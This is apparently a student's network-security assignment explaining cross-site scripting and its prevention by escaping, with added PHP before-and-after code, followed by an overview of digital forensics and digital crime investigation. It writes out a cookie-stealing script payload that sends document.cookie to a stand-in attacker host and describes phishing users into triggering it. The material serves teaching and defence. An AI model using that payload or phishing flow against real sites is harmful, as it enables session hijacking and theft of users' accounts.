My Opinion of XSS/CSS, Digital Forensic, and Digital Crime Investigation when I was a Young Student

Time: 2024-03-28 08:05:29 +0000


Note

This is the fourteenth assignment from my Masters Advanced Network Security Course, which has never been published anywhere. I, as the author and copyright holder, license this assignment under a customized CC-BY-SA, where anyone can share, copy, republish, and sell it on condition that they state my name as the author and note that the original and open version is available here.

1. XSS/CSS

XSS/CSS stands for cross-site scripting, a computer security vulnerability that allows scripts to be injected into web pages viewed by other users [1]. How does it differ from code injection? Code injection is a server-side vulnerability while XSS is a client-side vulnerability; what they have in common is that both are injection-type attacks [2]. One of the easiest methods to check for an XSS vulnerability is to include HTML tags in a form submission. For example, Figure 1 shows an <S> (strike-through) HTML tag inserted into a simple PHP form input (any PHP tutorial on the web has this form), and Figure 2 is an example of using an <img src=""> tag to add an image. Even worse, we can input tags that display the attacker's site instead of the victim site, with <script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>. (1) Once an XSS vulnerability has been found, we can send a phishing email containing the XSS script to a user of the site. (2) With good social engineering, the user can be tricked into running the code and connecting to the attacker's site through the XSS-vulnerable site. (3) The attacker can obtain the session ID and other information of the victim. [3]

1.strikethroughXSSexample.png

Figure 1. Checking XSS vulnerability strike through HTML tag example.

To prevent XSS we have to filter the user input. One way is to not allow HTML tags, or to perform sanitization that allows text-formatting tags such as <B> <U> <I> <S> and converts dangerous characters: & → &amp;, < → &lt;, > → &gt;, " → &quot;, ' → &#x27;, and / → &#x2F;. For my PHP code above, I can fix it by changing the output statement (adding htmlspecialchars) into "echo htmlspecialchars($string, ENT_QUOTES, 'UTF-8')". If it is difficult to write our own filter, there are libraries available for filtering XSS, such as "PHP AntiXSS", "xss_clean.php filter", "htmlpurifier", "xssprotect", and "XSS html filter". [4]
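
The fix described above, shown next to the unescaped output and the allowlist approach for formatting tags. This is an added PHP example, not the author's form code; the function names and sample inputs are constructed, and the script is meant to be run from the command line.

```php
<?php
// Added example; function names and sample inputs are constructed.

// Before: the form value is echoed as-is, so any tag in it is rendered.
function render_unsafe(string $input): string
{
    return '<p>You wrote: ' . $input . '</p>';
}

// After: the fix from the text. htmlspecialchars() with ENT_QUOTES
// escapes & < > " and ' (it does not escape "/").
function render_escaped(string $input): string
{
    return '<p>You wrote: ' . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . '</p>';
}

// Allowlist variant: escape everything first, then restore only the bare
// formatting tags <b> <u> <i> <s>. A tag carrying attributes stays escaped.
function render_with_formatting(string $input): string
{
    $escaped = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    $restored = preg_replace('~&lt;(/?)(b|u|i|s)&gt;~i', '<$1$2>', $escaped);
    return '<p>You wrote: ' . $restored . '</p>';
}

// Constructed inputs; the first, second and last are the ones the text uses.
$samples = [
    '<s>struck</s>',
    '<img src="">',
    '<s class="x">attribute</s>',
    '<script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>',
];

foreach ($samples as $sample) {
    echo "input      : $sample\n";
    echo "unsafe     : " . render_unsafe($sample) . "\n";
    echo "escaped    : " . render_escaped($sample) . "\n";
    echo "formatting : " . render_with_formatting($sample) . "\n\n";
}
```

Only the first sample keeps live markup in the "formatting" output; the image tag, the tag with an attribute and the script tag all come out as inert text.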

2.imgsrcXSS.png

Figure 2. Checking XSS vulnerability image HTML tag example.

2. Digital Crime Investigation vs Digital Forensic

Digital crime investigation is mainly used in criminal investigation to enhance the investigation process itself. It is more like an auxiliary tool, specifically a digital type of tool. Examples are (1) the use of surveillance cameras to capture a robbery in a store, (2) categorizing data, clustering data, and plotting graphs, which fall under data mining, and (3) using a database to store crime records. Digital forensic, on the other hand, is to extract, collect, analyze, and preserve digital evidence, for example to be shown in court. [5]

3.digital-forensic-on-hardware.png

Figure 3. Illustration of digital forensic on hardware containing data.

Both digital crime investigation and digital forensic are part of a subject called forensic science. Performing an autopsy on a dead body to find the cause of death is an example of medical forensic. Examining a computer to search for information about an attack on it is an example of digital forensic. The basic steps are to (1) identify the attack, its extent, and the damage caused, (2) identify the source of the attack, and (3) record the incident. The scope of digital forensic can be computer forensic, as in the example above, or network forensic, which is on a larger scale and includes computer forensic. Unlike medical forensic, we can first create a duplicate of the computer data or network data before running digital forensic, which makes it a safe type of investigation that avoids the risk of destroying the evidence. The items most commonly examined in digital forensics are maintenance of files and folders, disk logs, server logs, logs from IDS/IPS, and network packets if captured. [5]

3. Reference

  1. https://en.wikipedia.org/wiki/Cross-site_scripting
  2. https://community.rapid7.com/community/nexpose/blog/2013/06/20/xss-vs-injection
  3. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98590&chapterid=4892
  4. http://resources.infosecinstitute.com/how-to-prevent-cross-site-scripting-attacks
  5. http://md.kumamoto-u.ac.jp/mod/book/view.php?id=98593&chapterid=4897
